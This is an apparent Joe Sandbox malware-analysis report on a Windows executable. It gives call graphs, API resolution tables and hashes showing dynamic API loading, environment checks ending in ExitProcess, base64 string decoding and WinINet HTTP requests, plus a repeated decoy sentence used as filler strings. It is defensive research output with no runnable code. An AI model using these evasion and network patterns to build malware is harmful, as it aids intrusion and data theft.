37204 f25aa6 StrCmpCA 37206 f25be1 37204->37206 37204->37232 37209 f25a55 37205->37209 37208 f2abb0 lstrcpy 37206->37208 37207 f2abb0 lstrcpy 37207->37232 37210 f25bed 37208->37210 37211 f116b0 lstrcpy 37209->37211 37212 f2ab30 2 API calls 37210->37212 37229 f25a61 37211->37229 37213 f25bfb 37212->37213 37215 f2ab30 2 API calls 37213->37215 37214 f25c5b StrCmpCA 37216 f25c66 Sleep 37214->37216 37217 f25c78 37214->37217 37218 f25c0a 37215->37218 37216->37232 37219 f2abb0 lstrcpy 37217->37219 37222 f116b0 lstrcpy 37218->37222 37220 f25c84 37219->37220 37223 f2ab30 2 API calls 37220->37223 37221 f11590 lstrcpy 37221->37232 37222->37229 37224 f25c93 37223->37224 37225 f2ab30 2 API calls 37224->37225 37226 f25ca2 37225->37226 37228 f116b0 lstrcpy 37226->37228 37227 f259da StrCmpCA 37227->37232 37228->37229 37229->36285 37230 f25b8f StrCmpCA 37230->37232 37231 f2aab0 lstrcpy 37231->37232 37232->37193 37232->37194 37232->37195 37232->37196 37232->37201 37232->37202 37232->37204 37232->37207 37232->37214 37232->37221 37232->37227 37232->37230 37232->37231 37234 f276e3 GetVolumeInformationA 37233->37234 37235 f276dc 37233->37235 37236 f27721 37234->37236 37235->37234 37237 f2778c GetProcessHeap RtlAllocateHeap 37236->37237 37238 f277b8 wsprintfA 37237->37238 37239 f277a9 37237->37239 37241 f2aa50 lstrcpy 37238->37241 37240 f2aa50 lstrcpy 37239->37240 37242 f25ff7 37240->37242 37241->37242 37242->36306 37244 f2aab0 lstrcpy 37243->37244 37245 f148e9 37244->37245 37446 f14800 37245->37446 37247 f148f5 37248 f2aa50 lstrcpy 37247->37248 37249 f14927 37248->37249 37250 f2aa50 lstrcpy 37249->37250 37251 f14934 37250->37251 37252 f2aa50 lstrcpy 37251->37252 37253 f14941 37252->37253 37254 f2aa50 lstrcpy 37253->37254 37255 f1494e 37254->37255 37256 f2aa50 lstrcpy 37255->37256 37257 f1495b InternetOpenA StrCmpCA 37256->37257 37258 f14994 37257->37258 37259 f14f1b InternetCloseHandle 37258->37259 37452 f28cf0 37258->37452 37261 f14f38 37259->37261 37467 f1a210 CryptStringToBinaryA 
37261->37467 37262 f149b3 37460 f2ac30 37262->37460 37265 f149c6 37267 f2abb0 lstrcpy 37265->37267 37273 f149cf 37267->37273 37268 f2ab30 2 API calls 37269 f14f55 37268->37269 37270 f2acc0 4 API calls 37269->37270 37272 f14f6b 37270->37272 37271 f14f77 codecvt 37275 f2aab0 lstrcpy 37271->37275 37274 f2abb0 lstrcpy 37272->37274 37276 f2acc0 4 API calls 37273->37276 37274->37271 37288 f14fa7 37275->37288 37277 f149f9 37276->37277 37278 f2abb0 lstrcpy 37277->37278 37279 f14a02 37278->37279 37280 f2acc0 4 API calls 37279->37280 37281 f14a21 37280->37281 37282 f2abb0 lstrcpy 37281->37282 37283 f14a2a 37282->37283 37284 f2ac30 3 API calls 37283->37284 37285 f14a48 37284->37285 37286 f2abb0 lstrcpy 37285->37286 37287 f14a51 37286->37287 37289 f2acc0 4 API calls 37287->37289 37288->36309 37290 f14a70 37289->37290 37291 f2abb0 lstrcpy 37290->37291 37292 f14a79 37291->37292 37293 f2acc0 4 API calls 37292->37293 37294 f14a98 37293->37294 37295 f2abb0 lstrcpy 37294->37295 37296 f14aa1 37295->37296 37297 f2acc0 4 API calls 37296->37297 37298 f14acd 37297->37298 37299 f2ac30 3 API calls 37298->37299 37300 f14ad4 37299->37300 37301 f2abb0 lstrcpy 37300->37301 37302 f14add 37301->37302 37303 f14af3 InternetConnectA 37302->37303 37303->37259 37304 f14b23 HttpOpenRequestA 37303->37304 37306 f14b78 37304->37306 37307 f14f0e InternetCloseHandle 37304->37307 37308 f2acc0 4 API calls 37306->37308 37307->37259 37309 f14b8c 37308->37309 37310 f2abb0 lstrcpy 37309->37310 37311 f14b95 37310->37311 37312 f2ac30 3 API calls 37311->37312 37313 f14bb3 37312->37313 37314 f2abb0 lstrcpy 37313->37314 37315 f14bbc 37314->37315 37316 f2acc0 4 API calls 37315->37316 37317 f14bdb 37316->37317 37318 f2abb0 lstrcpy 37317->37318 37319 f14be4 37318->37319 37320 f2acc0 4 API calls 37319->37320 37321 f14c05 37320->37321 37322 f2abb0 lstrcpy 37321->37322 37323 f14c0e 37322->37323 37324 f2acc0 4 API calls 37323->37324 37325 f14c2e 37324->37325 37326 f2abb0 lstrcpy 37325->37326 37327 f14c37 37326->37327 37328 
f2acc0 4 API calls 37327->37328 37329 f14c56 37328->37329 37330 f2abb0 lstrcpy 37329->37330 37331 f14c5f 37330->37331 37332 f2ac30 3 API calls 37331->37332 37333 f14c7d 37332->37333 37334 f2abb0 lstrcpy 37333->37334 37335 f14c86 37334->37335 37336 f2acc0 4 API calls 37335->37336 37337 f14ca5 37336->37337 37338 f2abb0 lstrcpy 37337->37338 37339 f14cae 37338->37339 37340 f2acc0 4 API calls 37339->37340 37341 f14ccd 37340->37341 37342 f2abb0 lstrcpy 37341->37342 37343 f14cd6 37342->37343 37344 f2ac30 3 API calls 37343->37344 37345 f14cf4 37344->37345 37346 f2abb0 lstrcpy 37345->37346 37347 f14cfd 37346->37347 37348 f2acc0 4 API calls 37347->37348 37349 f14d1c 37348->37349 37350 f2abb0 lstrcpy 37349->37350 37351 f14d25 37350->37351 37352 f2acc0 4 API calls 37351->37352 37353 f14d46 37352->37353 37354 f2abb0 lstrcpy 37353->37354 37355 f14d4f 37354->37355 37356 f2acc0 4 API calls 37355->37356 37357 f14d6f 37356->37357 37358 f2abb0 lstrcpy 37357->37358 37359 f14d78 37358->37359 37360 f2acc0 4 API calls 37359->37360 37361 f14d97 37360->37361 37362 f2abb0 lstrcpy 37361->37362 37363 f14da0 37362->37363 37364 f2ac30 3 API calls 37363->37364 37365 f14dbe 37364->37365 37366 f2abb0 lstrcpy 37365->37366 37367 f14dc7 37366->37367 37368 f2aa50 lstrcpy 37367->37368 37369 f14de2 37368->37369 37370 f2ac30 3 API calls 37369->37370 37371 f14e03 37370->37371 37372 f2ac30 3 API calls 37371->37372 37373 f14e0a 37372->37373 37374 f2abb0 lstrcpy 37373->37374 37375 f14e16 37374->37375 37376 f14e37 lstrlen 37375->37376 37377 f14e4a 37376->37377 37378 f14e53 lstrlen 37377->37378 37466 f2ade0 37378->37466 37380 f14e63 HttpSendRequestA 37381 f14e82 InternetReadFile 37380->37381 37382 f14eb7 InternetCloseHandle 37381->37382 37387 f14eae 37381->37387 37385 f2ab10 37382->37385 37384 f2acc0 4 API calls 37384->37387 37385->37307 37386 f2abb0 lstrcpy 37386->37387 37387->37381 37387->37382 37387->37384 37387->37386 37473 f2ade0 37388->37473 37390 f21a14 StrCmpCA 37391 f21a1f ExitProcess 37390->37391 
37403 f21a27 37390->37403 37392 f21c12 37392->36311 37393 f21b1f StrCmpCA 37393->37403 37394 f21afd StrCmpCA 37394->37403 37395 f21b82 StrCmpCA 37395->37403 37396 f21b63 StrCmpCA 37396->37403 37397 f21bc0 StrCmpCA 37397->37403 37398 f21b41 StrCmpCA 37398->37403 37399 f21ba1 StrCmpCA 37399->37403 37400 f21acf StrCmpCA 37400->37403 37401 f21aad StrCmpCA 37401->37403 37402 f2ab30 lstrlen lstrcpy 37402->37403 37403->37392 37403->37393 37403->37394 37403->37395 37403->37396 37403->37397 37403->37398 37403->37399 37403->37400 37403->37401 37403->37402 37404->36317 37405->36319 37406->36325 37407->36327 37408->36333 37409->36335 37410->36339 37411->36343 37412->36347 37413->36353 37414->36355 37415->36359 37416->36373 37417->36377 37418->36376 37419->36372 37420->36376 37421->36395 37422->36379 37423->36381 37424->36385 37425->36387 37426->36392 37427->36399 37428->36402 37429->36408 37430->36430 37431->36434 37432->36433 37433->36429 37434->36433 37435->36443 37438 f2aab0 lstrcpy 37437->37438 37439 f116c3 37438->37439 37440 f2aab0 lstrcpy 37439->37440 37441 f116d5 37440->37441 37442 f2aab0 lstrcpy 37441->37442 37443 f116e7 37442->37443 37444 f2aab0 lstrcpy 37443->37444 37445 f115a3 37444->37445 37445->37170 37447 f14816 37446->37447 37448 f14888 lstrlen 37447->37448 37472 f2ade0 37448->37472 37450 f14898 InternetCrackUrlA 37451 f148b7 37450->37451 37451->37247 37453 f2aa50 lstrcpy 37452->37453 37454 f28d04 37453->37454 37455 f2aa50 lstrcpy 37454->37455 37456 f28d12 GetSystemTime 37455->37456 37457 f28d29 37456->37457 37458 f2aab0 lstrcpy 37457->37458 37459 f28d8c 37458->37459 37459->37262 37462 f2ac41 37460->37462 37461 f2ac98 37463 f2aab0 lstrcpy 37461->37463 37462->37461 37464 f2ac78 lstrcpy lstrcat 37462->37464 37465 f2aca4 37463->37465 37464->37461 37465->37265 37466->37380 37468 f1a249 LocalAlloc 37467->37468 37469 f14f3e 37467->37469 37468->37469 37470 f1a264 CryptStringToBinaryA 37468->37470 37469->37268 37469->37271 37470->37469 37471 f1a289 LocalFree 
37470->37471 37471->37469 37472->37450 37473->37390 37474 138d064 37475 138d35d LoadLibraryA 37474->37475 37477 138d524 37475->37477

                                      Control-flow Graph
                                      • Function f29bb0-f29f12: call f29aa0, then call f29ad0 with GetProcAddress * 21 (f29bca-f29dde), LoadLibraryA * 5 (f29de3-f29e42), and GetProcAddress * 7 across f29e44-f29f0c; the rendered graph with its Executed / Not Executed colouring is not reproduced here.
                                      APIs
                                      • GetProcAddress.KERNEL32(74DD0000,01D82470), ref: 00F29BF1
                                      • GetProcAddress.KERNEL32(74DD0000,01D82260), ref: 00F29C0A
                                      • GetProcAddress.KERNEL32(74DD0000,01D82368), ref: 00F29C22
                                      • GetProcAddress.KERNEL32(74DD0000,01D82278), ref: 00F29C3A
                                      • GetProcAddress.KERNEL32(74DD0000,01D82338), ref: 00F29C53
                                      • GetProcAddress.KERNEL32(74DD0000,01D89138), ref: 00F29C6B
                                      • GetProcAddress.KERNEL32(74DD0000,01D75A70), ref: 00F29C83
                                      • GetProcAddress.KERNEL32(74DD0000,01D75730), ref: 00F29C9C
                                      • GetProcAddress.KERNEL32(74DD0000,01D82488), ref: 00F29CB4
                                      • GetProcAddress.KERNEL32(74DD0000,01D823B0), ref: 00F29CCC
                                      • GetProcAddress.KERNEL32(74DD0000,01D82290), ref: 00F29CE5
                                      • GetProcAddress.KERNEL32(74DD0000,01D823C8), ref: 00F29CFD
                                      • GetProcAddress.KERNEL32(74DD0000,01D75770), ref: 00F29D15
                                      • GetProcAddress.KERNEL32(74DD0000,01D823F8), ref: 00F29D2E
                                      • GetProcAddress.KERNEL32(74DD0000,01D822A8), ref: 00F29D46
                                      • GetProcAddress.KERNEL32(74DD0000,01D757F0), ref: 00F29D5E
                                      • GetProcAddress.KERNEL32(74DD0000,01D822D8), ref: 00F29D77
                                      • GetProcAddress.KERNEL32(74DD0000,01D82440), ref: 00F29D8F
                                      • GetProcAddress.KERNEL32(74DD0000,01D759F0), ref: 00F29DA7
                                      • GetProcAddress.KERNEL32(74DD0000,01D824B8), ref: 00F29DC0
                                      • GetProcAddress.KERNEL32(74DD0000,01D75A50), ref: 00F29DD8
                                      • LoadLibraryA.KERNEL32(01D82530,?,00F26CA0), ref: 00F29DEA
                                      • LoadLibraryA.KERNEL32(01D82590,?,00F26CA0), ref: 00F29DFB
                                      • LoadLibraryA.KERNEL32(01D825A8,?,00F26CA0), ref: 00F29E0D
                                      • LoadLibraryA.KERNEL32(01D82560,?,00F26CA0), ref: 00F29E1F
                                      • LoadLibraryA.KERNEL32(01D82548,?,00F26CA0), ref: 00F29E30
                                      • GetProcAddress.KERNEL32(75A70000,01D825C0), ref: 00F29E52
                                      • GetProcAddress.KERNEL32(75290000,01D82578), ref: 00F29E73
                                      • GetProcAddress.KERNEL32(75290000,01D825D8), ref: 00F29E8B
                                      • GetProcAddress.KERNEL32(75BD0000,01D82518), ref: 00F29EAD
                                      • GetProcAddress.KERNEL32(75450000,01D75750), ref: 00F29ECE
                                      • GetProcAddress.KERNEL32(76E90000,01D89128), ref: 00F29EEF
                                      • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00F29F06
                                      Strings
                                      • NtQueryInformationProcess, xrefs: 00F29EFA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: NtQueryInformationProcess
                                      • API String ID: 2238633743-2781105232
                                      • Opcode ID: bff94f381aa73012fc89ebc0e17ffffc0b27b16c9247254cc236366fb2ef096d
                                      • Instruction ID: 61cd237d840f9cf558760a5a01e23251003face52db0c6505ed317ff74f6711e
                                      • Opcode Fuzzy Hash: bff94f381aa73012fc89ebc0e17ffffc0b27b16c9247254cc236366fb2ef096d
                                      • Instruction Fuzzy Hash: 1FA121B55002019FE36CDFE8F88896677EAE759701750893AF52A8B298D734A5C1CFA0

                                      Control-flow Graph
                                      • Function f14610-f147f9: RtlAllocateHeap in f14610-f146e5, a loop over f146f0-f1479a, then VirtualProtect in f1479f-f147f9; the rendered graph with its Executed / Not Executed colouring is not reproduced here.
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F1465F
                                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00F147EC
                                      Strings
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F146A7
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F146FC
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14643
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14763
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F147C0
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F1471D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14672
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F147B5
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14784
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F147AA
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F147CB
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F1467D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F1478F
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14617
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14667
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F146BD
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F1476E
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F146B2
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F146C8
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14707
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F1462D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14638
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14779
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F1479F
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F146D3
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14728
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14622
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14688
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14693
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14712
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeapProtectVirtual
                                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in 
the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus 
Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                      • API String ID: 1542196881-2218711628
                                      • Opcode ID: 5cf6c26ab2a3692b0bf29a0ef67820f9b1d2e53a05ec48b19749afe9cc17433c
                                      • Instruction ID: d14bf470930b4d811f4aab2822e73724bb0c6ac7c34e8a81ea31106601fce6fe
                                      • Opcode Fuzzy Hash: 5cf6c26ab2a3692b0bf29a0ef67820f9b1d2e53a05ec48b19749afe9cc17433c
                                      • Instruction Fuzzy Hash: 4B4123607C2615FFC628F7E4894EE9D76637F82B94F609040BA02562C2CBF0D5886723

                                      Control-flow Graph (legend: Executed / Not Executed; rendered graph not reproduced in text). Basic blocks span f162d0 to f1657d and call, in order, InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, HttpSendRequestA, HttpQueryInfoA, InternetReadFile and InternetCloseHandle, with subcalls to f2aab0, f14800, f2aa50, f2ab10, f28ad0, f2acc0 and f2abb0.
                                      APIs
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                        • Part of subcall function 00F14800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F14889
                                        • Part of subcall function 00F14800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F14899
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                      • InternetOpenA.WININET(00F30DFF,00000001,00000000,00000000,00000000), ref: 00F16331
                                      • StrCmpCA.SHLWAPI(?,01D8E958), ref: 00F16353
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F16385
                                      • HttpOpenRequestA.WININET(00000000,GET,?,01D8E3C8,00000000,00000000,00400100,00000000), ref: 00F163D5
                                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00F1640F
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F16421
                                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00F1644D
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00F164BD
                                      • InternetCloseHandle.WININET(00000000), ref: 00F1653F
                                      • InternetCloseHandle.WININET(00000000), ref: 00F16549
                                      • InternetCloseHandle.WININET(00000000), ref: 00F16553
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                      • String ID: ERROR$ERROR$GET
                                      • API String ID: 3749127164-2509457195
                                      • Opcode ID: ec5c4a983faf953bc10160b3211377c42c80ff0147678b1ef41d3f8a23ec1047
                                      • Instruction ID: 5fd259f89465bc0e733f7efcbc3842f7c9232d0c7571469902b1a760ae8fd493
                                      • Opcode Fuzzy Hash: ec5c4a983faf953bc10160b3211377c42c80ff0147678b1ef41d3f8a23ec1047
                                      • Instruction Fuzzy Hash: 7C713D71A00218EBDB24DFD0DC55BEEB7B5BB44710F108198F50AAB1C4DBB46A84DF51

